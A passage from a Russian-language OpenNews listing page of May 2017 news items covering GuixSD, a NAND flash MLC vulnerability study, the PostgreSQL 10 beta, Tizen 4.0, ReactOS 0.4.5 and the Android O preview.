Дистрибутив включает только свободные компоненты и поставляется с ядром GNU Linux-Libre 4.11, очищенным от несвободных элементов бинарных прошивок. Для сборки применяется GCC 7. В качестве системы инициализации используется сервисный менеджер GNU Shepherd (бывший dmd), развиваемый как альтернатива SysV-init с поддержкой зависимостей. Управляющий демон и утилиты Shepherd написаны на языке Guile (одна из реализаций языка Scheme), который также используется и для определения параметров запуска сервисов. Базовые образ поддерживает работу в консольном режиме, но для установки подготовлено более 5400 готовых пакетов, среди которых и компоненты графического стека на базе X.Org, оконные менеджеры dwm и ratpoison, а также ряд программ на базе библиотеки GTK+.

Основные новшества:

  • Добавлена поддержка архитектуры aarch64 (ARM64), но бинарные установочные архивы пока не формируются из-за неготовности сборочной инфраструктуры;
  • Прекращено формирование установочных сборок mips64el. Поддержка самой архитектуры пока сохранена, но останется ли она в дальнейшем будет зависеть от наличия заинтересованных разработчиков;
  • В сборки GuixSD добавлена поддержка загрузки на системах с UEFI и возможность установки на разделы с Btrfs;
  • В GuixSD обеспечена возможность запуска системных сервисов (фоновых процессов) в изолированных контейнерах, что позволяет защитить систему от возможных уязвимостей в данных сервисах;
  • По сравнению с прошлым выпуском добавлено 840 новых пакетов, в том числе сформированы пакеты с 0 A.D, freeciv, freedoom, alpine, alsa-plugins, cargo, cdrtools, ceph, freerdp, freetalk, neovim, scrypt, stunnel, unrar, xinetd;
  • Обновлены версии программ в 1220 пакетах, в том числе glibc 2.25, Linux-libre 4.11 и GCC 7.
  • Добавлены новые системные сервисы для Redis, Exim и Open vSwitch, значительно улучшен интерфейс сервиса Nginx;
  • Реализована новая команда "guix pack", предназначенная для создания бинарных пакетов;
  • В Guix обеспечена поддержка работы с использованием новой версии GNU Guile 2.2;
  • В команду "guix publish" добавлена опция "--cache", обеспечивающая режим кэширования для ускорения доставки бинарных сборок большому числу пользователей;
  • Решена большая порция проблем с обеспечением повторяемых сборок пакетов.

  1. OpenNews: Опубликован пакетный менеджер GNU Guix 0.12 и дистрибутив GuixSD на его основе
  2. OpenNews: Фонд СПО признал ProteanOS полностью свободным дистрибутивом
  3. OpenNews: Фонд СПО признал Guix полностью свободным дистрибутивом
Обсуждение (45 +6) | Тип: Программы |
21.05.2017 Уязвимость в NAND Flash может привести к повреждению чужих данных на SSD-накопителях (49 +20)
  Группа исследователей из Университета Карнеги-Меллона, компании Seagate и Швейцарской высшей технической школы Цюриха выявила низкоуровневую уязвимость в организации хранения информации на современных NAND Flash-чипах, применяемых в SSD-накопителях. Атакующий может сформировать определённую активность со своими данными на накопителе, в результате которой будет нарушена целостность неподконтрольных ему данных, которыми манипулируют другие процессы.

Уязвимость вызвана особенностями хранения данных чипами NAND Flash, поддерживающими технологию MLC (Multi-Level Cell), при которой каждая ячейка может принимать одно из четырёх пороговых напряжений (низкое — 0, два промежуточных — 01/10 и высокое — 11), т.е. MLC обеспечивает хранение в одной ячейке сразу двух битов, в отличие от классической схемы SLC (Single-Level Cell), при которой низкое напряжение в ячейке соответствует 0, а высокое — 1. Из-за паразитной ёмкостной связи между соседними ячейками программирование содержимого ячеек может влиять на уровень заряда в соседних ячейках и появлению ошибок в них, когда к ранее незаряженной ячейке прикладывается высокий уровень напряжения.

Для обхода подобного эффекта производители применяют двухэтапный метод программирования ячеек, при котором вначале устанавливается бит, задаваемый промежуточным напряжением, а затем напряжение ячейки доводится до высокого. Исследователи показали, что подобная мера не является полностью надёжной и имеет слабое звено. В частности, доказано, что частично запрограммированные ячейки, для которых завершён первый этап программирования, но ещё не выполнен второй, значительно более подвержены влиянию изменения напряжения в соседних ячейках и возникновению искажений при чтении ("read disturb"), чем полностью запрограммированные ячейки. В результате разработаны две атаки, нацеленные на искажение значений в частично запрограммированных ячейках.

Первая атака реализуется через выполнение операций записи данных, соответствующих определённому шаблону, который позволят в 4,9 раза увеличить вероятность возникновения ошибки при работе алгоритма программирования ячеек MLC и в качестве косвенного влияния приводит к повреждению значений в соседних ячейках, находящихся в первой фазе программирования. Метод во многом напоминает атаку Rowhammer, нацеленную на повреждение содержимого ячеек DRAM и также разработанную в университете Карнеги-Меллон.

Вторая атака направлена на искажение данных при чтении значений частично запрограммированных ячеек из-за возникновения ошибок "read disturb" при выполнении большого числа операций чтения за очень короткий отрезок времени. Так как искажаются считываемые данные, то данный вид атаки приводит как к повреждению содержимого, уже сброшенного в частично запрограммированные ячейки, так и страниц, которые только готовятся к записи. Для производителей исследователи разработали несколько методов предотвращения атак, которые рекомендованы для внедрения.

  1. OpenNews: Разработан метод атаки на уязвимость в DRAM-памяти с использованием JavaScript
  2. OpenNews: Продемонстрировано использование уязвимости в DRAM-памяти для повышения привилегий в системе
  3. OpenNews: Содержимое ячеек DRAM может быть повреждено в результате цикличного чтения
  4. OpenNews: Представлен метод скрытого изменения памяти чужих виртуальных машин
Обсуждение (49 +20) | Тип: Проблемы безопасности |
19.05.2017 Началось бета-тестирование СУБД PostgreSQL 10 (31 +32)
  Доступна для тестирования бета-версия СУБД PostgreSQL 10. Релиз ожидается в начале осени. Выбор номера версии 10.0 вместо 9.7.0 связано с переходом проекта на новую нумерацию выпусков. Вместо трёхуровневневой нумерации (Major1.Major2.Minor) отныне будет применяться схема "Major.Minor", в которой "Major" указывает номер значительной ветки, а "Minor" - номер корректирующего обновления, не требующего перезаливки БД. Таким образом, первым корректирующим релизом PostgreSQL 10 станет 10.1, а следующей значительной версией PostgreSQL 11. Как и раньше значительные версии будут формироваться раз в год.

Основные улучшения:

  • Режим логической репликации, позволяющий выборочно реплицировать только заданные таблицы или использовать репликацию в процессе обновления. Данный вид репликации манипулирует логическими изменениями на уровне выполняемых операций, в то время как традиционная репликация работает на очень низком уровне, перенося байтовые изменения в WAL-журнале;
  • Добавлены встроенные возможности партицирования таблиц по диапазонам значений и спискам - разбивка теперь может задаваться через выражения "PARTITION BY" и "PARTITION OF" в директиве "CREATE TABLE". Например:
    
       CREATE TABLE padre (
         id             serial not null,
         nombre         text not null,
         fch_creado     timestamptz not null
        )
       PARTITION BY RANGE ( id );
    
       CREATE TABLE hijo_0
          partition of padre (id, primary key (id), unique (nombre))
          for values from (unbounded) to (9);
    
       CREATE TABLE hijo_1
          partition of padre (id, primary key (id), unique (nombre))
          for values from (10) to (unbounded);
    
  • Обеспечено распараллеливание с задействованием нескольких ядер CPU таких операций, как сканирование индексов и битовых карт, выполнение запросов со слиянием таблиц (JOIN);
  • Возможность подтверждения коммитов на основе кворума для предотвращения потери данных после выхода из строя сразу нескольких синхронно реплицируемых узлов. Например, теперь можно указать, что коммит должен быть подтверждён любыми К из N запасных синхронно реплицируемых серверов, без жестко заданной последовательности проверки;
  • Поддержка отслеживания незавершённых коммитов - позволяет выяснить статус недавно запущенной транзакции для организации восстановления после краха или обрыва соединения;
  • Поддержка аутентификации SCRAM для организации более безопасного доступа по паролю;
  • Многохостовый режим отказоустойчивости в libpq, при котором клиент соединяется с первым работающим хостом из заданного списка;
  • Добавлен параметр "target_session_attrs", позволяющий клиенту запросить хост, доступный на запись или чтение;
  • Для индексов типа Hash обеспечена поддержка репликации и повышена устойчивость к сбоям после крахов;
  • Добавлен новый тип полномочий, определяющий доступ к функциям мониторинга;
  • Добавлено выражение XMLTABLE, позволяющее представить XML-документ в табличном формате, что существенно упрощает разбор XML-данных, хранимых в БД;
  • Поддержка полнотекстового поиска для типов JSON и JSONB;
  • Поддержка сжатия данных в журналах pg_receivewal;
  • Добавлены средства для накопления статистики по корреляции данных в разных столбцах, которая может оказаться полезной для исключения выбора планировщиком некоторых ошибочных стратегий;
  • Добавлена независимая от операционной системы реализация свойства локали "Collation", позволяющего задавать правила сортировки и методы сопоставления с учётом смысла символов. Реализация основана на libicu и идентична для Linux и Windows;
  • Увеличена производительность функции SUM(), преобразования кодировок символов, выполнение выражений, группировки множеств и выполнения операций JOIN над уникальными столбцами. При выполнении аналитических запросов над большим числом строк наблюдается ускорение до 40%;
  • Из нарушающих совместимость изменений отмечается переименование "xlog" в "wal", прекращение поддержки устаревшего протокола FE/BE 1.0, изменение настроек по умолчанию для репликации и резервирования (pg_basebackup), прекращение поддержки значений времени (Timestamps) с плавающей запятой, удаление contrib/tsearch2 и прекращение поддержки в pg_dump баз данных от PostgreSQL 7.4 и более ранних выпусков.

  1. OpenNews: Релиз СУБД PostgreSQL 9.6
  2. OpenNews: Министерство обороны США выпустило STIG-рекомендации для решения на базе СУБД PostgreSQL
  3. OpenNews: Рассматривается переход СУБД PostgreSQL на новую нумерацию выпусков
  4. OpenNews: Релиз СУБД PostgreSQL 9.5
Обсуждение (31 +32) | Тип: Программы |
19.05.2017 Samsung анонсировал Tizen 4.0 и Tizen RT (65 +12)
  Компания Samsung анонсировала на проходящей в Сан-Франциско конференции Tizen Developer Conference (TDC) 2017 следующую значительную ветку Tizen 4.0, которая будет поставляться на смартфонах Samsung Z4. Примечательно, что новая ветка создана несмотря на то, что разработка Tizen 3.0 ещё не доведена до конца и пока не продвинулась дальше экспериментальных промежуточных (milestone) выпусков. Также представлен Tizen RT, вариант платформы, предназначенный для устройств категории интернет вещей (IoT), оснащённых процессорами Cortex-R4, ориентированными на решение задач в режиме реального времени.

Tizen RT примечателен тем, что система не использует ядро Linux, а запускается поверх RTOS-ядра TinyAra, основанного на наработках проекта Nuttx, расширенных поддержкой полноценного TCP/IP-стека, файловой системы SmartFS и привычными для Linux-систем средствами разработки (POSIX API, BSD Socket API, Shell и Kconfig). Для разработки приложений предлагается JerryScript (упрощённый движок JavaScript для IoT) и фрймворк IoT.js. Также обеспечена поддержка фреймворка IoTivity и СУБД AraStorage. Tizen RT сможет работать на устройствах с 2 Мб ОЗУ и 16 Мб Flash. Первым устройством, поставляемым с Tizen RT, станет модуль Artik 053, но отмечается, что платформа может масштабироваться для разного класса устройств от термостатов, весов и умных ламп, до телевизоров и мобильных устройств.

Что касается Tizen 4.0, то выпуск выделяется обеспечением поддержки разработки приложений на языке C# с использованием платформы Microsoft .NET Core и фреймворков Xamarin.Forms для построения графических интерфейсов. В том числе поддержка Tizen реализована для среды разработки Visual Studio 2017. Подобным шагом Samsung рассчитывает привлечь разработчиков, знакомых с технологиями .NET и средой Visual Studio, к разработке приложений для устройств на платформе Tizen.

В Tizen 4.0 также расширены возможности для адаптации платформы для устройств различных производителей, который смогут создавать свои решения для интернета вещей при помощи специального PDK (Platform Development Kit), позволяющего кастомизировать Tizen. Для поддержания прошивок в актуальном виде представлен новый сервис автоматической установки обновлений - Tizen Update Service. Также предложено решения для упрощения интеграции устройств с облачными системами для интернета вещей, такими как Samsung Connect.

Samsung Z4, первый смартфон на базе Tizen 4.0, относится к категории недорогих low-end устройств и будет оснащён процессором Spreadtrum 1.5GHz, 1GB ОЗУ, 4.5-экраном (800x480), аккумулятором 2050 mAh, поддержкой сетей 4G LTE, VoLTE, VoWiFi и Wi-Fi 802 11b/g/n , двумя 5-мегапиксельными камерами с приложениями, оптимизированными для отправки снимков и видео в социальные сети. Особенностью смартфона является возможность создавать различные комбинации нажатий кнопок и экранных жестов для быстрого вызова различных функций из спящего режима, таких как обработка голосовой команды, режим фонарика, запуск камеры и возврат на домашний экран. Устройство ориентировано на продажу в Индии, России, Китае, азиатских и африканских странах. Изначально смартфон Samsung Z4 поступит в продажу с прошивкой на базе Tizen 3, но позднее для устройств будет выпущено обновление для перехода на Tizen 4.

  1. OpenNews: Samsung выпустил .NET для Tizen
  2. OpenNews: Первый промежуточный выпуск Tizen 3.0 для смартфонов и телевизоров
  3. OpenNews: Выпуск мобильной платформы Tizen 2.3
  4. OpenNews: Выпуск Tizen IVI 3.0 для автомобильных информационно-развлекательных систем
  5. OpenNews: Samsung выпустил первый смартфон на основе платформы Tizen
Обсуждение (65 +12) | Тип: К сведению |
18.05.2017 Релиз ReactOS 0.4.5 (165 +10)
  Сформирован релиз операционной системы ReactOS 0.4.5, нацеленной на обеспечение совместимости с программами и драйверами Microsoft Windows. Это пятый выпуск, подготовленный после перехода проекта к более оперативному формированию релизов, которые теперь выходят не раз в год, а раз в три месяца. Для загрузки подготовлены установочный ISO-образ (102 Мб) и Live-сборка (200 Мб, в zip-архиве 73 Мб). Код проекта распространяется под лицензиями GPLv2 и LGPLv2.

Новый выпуск примечателен:

  • Большое внимание уделено усовершенствованию графической подсистемы, улучшена обработка шрифтов, отточен внешний вид и устранены ранее присутствующие недоработки в движке тем оформления. Доработана реализация стартового меню и добавлены дополнительные опции для каталогов. Ведётся работа над низкоуровневыми компонентами DirectX, добавлена опция для использования OpenGL или других графических стеков;
  • Обеспечена возможность запуска MS Office 2010 и подготовлен пакет с реализацией Samba для ReactOS;
  • Добавлена базовая реализация NTLM в библиотеку secur32. Решены проблемы с крахом приложений при использовании Winsock 2;
  • Добавлена новая утилита "at" и переработана команда "tree". Переписан просмотрщик событий;
  • Внесена большая порция исправлений в ядро и драйверы устройств, добавлена поддержка нового оборудования. Продолжена работа над обеспечением загрузки на системах с UEFI. Ускорена работа драйвера с реализацией FAT32;
  • Осуществлена синхронизация с кодовой базой Wine Staging 2.2 и обновлены версии сторонних компонентов: FreeType 2.7.1, zlib 1.2.11, libpng 1.6.28, libjpeg 9b, libtiff 4.0.7, uniata 0.46e3, ACPICA 20170303, mbedTLS 2.4.0, mkisofs schily-2017-02-16.

  1. OpenNews: Релиз ReactOS 0.4.4
  2. OpenNews: Релиз ReactOS 0.4.3
  3. OpenNews: Релиз ReactOS 0.4.2
  4. OpenNews: Вышел ReactOS 0.4.1
  5. OpenNews: Релиз ReactOS 0.4.0
Обсуждение (165 +10) | Тип: Программы |
18.05.2017 Второй предварительный выпуск Android 8 (65 +10)
  На проходящей в эти дни конференции Google I/O представлен второй предварительный выпуск следующей редакции открытой мобильной платформы Android - Android O Developer Preview 2, который отмечен как достигший уровня качества бета-версии. Релиз Android O также известный как Android 8, ожидается в третьем квартале 2017 года. Для оценки новых возможностей платформы введена программа бета-тестирования, в рамках которой экспериментальную ветку можно установить и поддерживать в актуальном виде через штатный интерфейс установки обновлений (OTA, over-the-air), без необходимости ручной замены прошивки. Обновления доступны для пользователей устройств Nexus 5X, Nexus 6P, Nexus Player, Pixel, Pixel XL и Pixel C.

Особенности Android O Developer Preview 2:

  • Поддержка многооконного режима "картинка в картинке" (PIP API, Picture in Picture), позволяющего приложениям выводить окна поверх мультимедийного контента. Например, при поступлении нового сообщения в чате во время просмотра видео можно отобразить окно для написания ответа непосредственно поверх видео. Ранее PIP API был доступен только для Android TV, но теперь адаптирован для смартфонов и планшетов. Кроме PIP API в новой версии также предоставлена возможность создания приложениям окон, выводимых поверх контетента (overlay window) вместо системного окна для отображения предупреждений;
  • Реализация каналов уведомлений, позволяющих приложениям разделять уведомления на категории с предоставлением пользователю гибких возможностей по управлению различными типами уведомлений. Вместо управления всеми уведомлениями приложения как одним целым, появилась возможность настройки поведения или блокирования отдельных каналов, на которые приложение разделяет свои уведомления. Например, для приложения чтения новостей можно отключить уведомления о показе политических и спортивных мероприятий, оставив вывод уведомлений о новостях развития технологий. В новом выпуске также представлены новые методы оформления и группировки уведомлений;
  • Новый API Autofill для создания индивидуальных приложений-обработчиков автоматического заполнения форм. По аналогии с тем, как можно подключать различные реализации экранных клавиатур, появилась возможность создания приложений, берущих на себя работу сохранения и безопасного доступа к таким данным, как адреса, имена пользователей, пароли, номера карт и т.п.
  • Новая реализация домашнего экрана для Android TV, нацеленная на упрощение поиска, предварительной оценки и просмотра контента, предоставляемого приложениями. Приложения могут публиковать один или более каналов, которые по выбору пользователя могут размещаться на домашнем экране;
  • Реализация умной системы выделения текста. Благодаря применению машинного обучения теперь автоматически распознаются упоминания в тексте адресов, номеров телефонов, ссылок, email и подобной информации, что позволяет при выполнении операций копирования в буфер обмена обеспечить выделения данных элементов целиком, а не посимвольно. Кроме того, предоставлены средства для рекомендации приложений для дальнейших операций с выделенным блоком (например, для email будет предложен почтовый клиент);
  • Представлена начальная реализация TensorFlow Lite, легковесного варианта платформы машинного обучения TensorFlow, позволяющего интегрировать в мобильные приложения функции классификации и распознавания изображений, текста и видео, создания чат-ботов и т.п. Для задействования в подобных приложениях средств для аппаратного ускорения вычислений развивается специальный Neural Network API;
  • Продолжается работа над проектом Android Vitals, ориентированным на оптимизацию производительности графической подсистемы, ускорение запуска, продление автономной работы от аккумулятора и повышение стабильности платформы. Добавлена новая система для автоматического ограничения активности фонового выполнения приложений. Ограничение производится в трёх направлениях: блокирование неявных broadcast-обработчиков, лимитирование доступа к сервисам в фоновом режиме и снижение частоты предоставления информации о местоположении. Проведена оптимизация Android Runtime: по сравнению с Android 7 скорость прохождения некоторых тестов увеличилась до двух раз;
  • В Play Console добавлен интерфейс для определения типовых проблем в приложениях - крахов, зависаний, приостановки вывода, медленной отрисовки, частых пробуждений из спящего режима, проблем с блокировками. Информация о данных проблемах теперь выводится в Play Console вместе с оценкой возможных причин и рекомендациями по устранению;
  • Добавлена поддержка организации вывода на несколько экранов (multi-display). Если приложение поддерживает многооконный режим и к устройству подключено несколько экранов, то пользователь теперь может перемещать окна с из одного экрана на другой, а приложение выбирать на каком экране отобразить информацию;
  • Реализована возможность разработки с использованием новых API, появившихся в Java 8, включая API java.time. Поддержка языковых возможностей Java 8 добавлена в компилятор javac и набор утилит dx. Инструментарий Jack переведён в разряд устаревших;
  • Шрифты стали полноценными ресурсами и могут использоваться приложениями в XML-макетах, в том числе в XML можно определять семейства шрифтов, указывая стиль, размер и файлы со шрифтами;
  • Поддержка адаптивных пиктограмм, подстраивающихся под интерфейс, применяемый производителем устройства. Например, можно сделать пиктограмму, которая может быть как круглой, так и квадратной или со сглаженными углами. Также реализованы новые анимированные действия с пиктограммами, применяемые в ланчере, ярлыках, настройках, диалогах обмена данными и обзорном экране;
  • Возможность использования цветового пространства Wide-gamut в приложениях, работающих с изображениями;
  • Добавлена поддержка звуковых кодеков для высококачественной передачи звука через Bluetooth, таких как LDAC;
  • Добавлена поддержка технологии Wi-Fi Aware (Neighbor Awareness Networking или NAN), которая при наличии совместимого оборудования позволяет находить и подключаться к другим устройствам, поддерживающим Wi-Fi Aware, через установку прямого беспроводного соединения без необходимости использования точки доступа;
  • Представлен фреймворк Telecom, расширяющий API ConnectionService и позволяющий интегрировать сторонние программы дозвона с системным пользовательским интерфейсом и бесшовно взаимодействовать с другими звуковыми приложениями. Например, приложение может отображать информацию о поступившем звонке в различных видах интерфейсов, таких как головной экран автомобильной информационно-развлекательной системы;
  • Добавлены средства для организации навигации по интерфейсу с использованием клавиатуры. Например, перемещения указателя клавишами управления курсором или смена фокуса табуляцией. Возможность стала актуальной после реализации поддержки в Google Play возможности запуска приложений на устройствах с Chrome OS, снабжённых полноценной клавиатурой;
  • Представлен API AAudio API, предназначенный для использования в приложениях профессиональной обработки звука, требующих максимальной производительности и минимальных задержек при работе со звуком. При использовании AAudio отправка и получение звуковых данных производится через потоки;
  • В браузерном движке WebView появилась поддержка многопроцессного режима, при котором обработка разного web-контента выносится в отдельные изолированные друг от друга процессы. В Android O данный режим включен по умолчанию. Для приложений в WebView также предложены новые API для обработки ошибок и крахов. Опционально реализована возможность предварительной проверки URL на безопасность связанного с ним контента в сервисе Google Safe Browsing;
  • Представлена платформа Android Go, предназначенная для комплектации устройств с небольшим размером ОЗУ. Подробности вынесены в отдельный анонс;
  • Реализована прослойка Treble, которая позволяет производителям создавать универсальные компоненты поддержки оборудования, не привязанные к конкретным версиям Android и используемым в них выпускам ядра Linux;

  1. OpenNews: Google представил прослойку для отделения поддержки оборудования от версий Android
  2. OpenNews: Проект Halium нацелен на унификацию основы мобильных Linux-платформ, отличных от Android
  3. OpenNews: Проект Anbox развивает окружение для запуска Android-приложений в дистрибутивах Linux
  4. OpenNews: Для Android реализована возможность применения штатных видеодрайверов Linux
  5. OpenNews: Предварительный выпуск платформы Android 8
Обсуждение (65 +10) | Тип: К сведению |
Следующая страница (раньше) >>


  Закладки на сайте
  Проследить за страницей
Created 1996-2017 by Maxim Chirkov  
ДобавитьРекламаВебмастеруГИД  
Hosting by Ihor TopList